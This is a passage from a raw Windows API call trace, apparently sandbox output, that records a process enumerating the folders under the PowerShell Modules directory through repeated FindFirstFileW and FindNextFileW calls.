ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0264.640] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0264.640] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0264.640] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0264.640] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0264.640] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0264.640] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0264.640] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0264.640] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.641] FindClose (in: hFindFile=0x1a8db020 | out: hFindFile=0x1a8db020) returned 1 [0264.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e5f0) returned 1 [0264.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e5b0) returned 1 [0264.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e6a0) returned 1 [0264.641] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b81e190, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0264.641] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b81e130, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0264.641] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*", lpFindFileData=0x1b81e340 | out: lpFindFileData=0x1b81e340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.641] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.642] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0264.642] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0264.642] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0264.642] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0264.642] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0264.643] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0264.643] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0264.643] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0264.643] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0264.643] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0264.644] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0264.644] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0264.644] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0264.644] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0264.644] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0264.644] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0264.645] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0264.645] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0264.645] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0264.645] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0264.645] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0264.646] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0264.646] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0264.646] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0264.646] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0264.646] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0264.647] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0264.647] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0264.647] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0264.647] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0264.648] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0264.648] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0264.648] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0264.648] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0264.648] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, 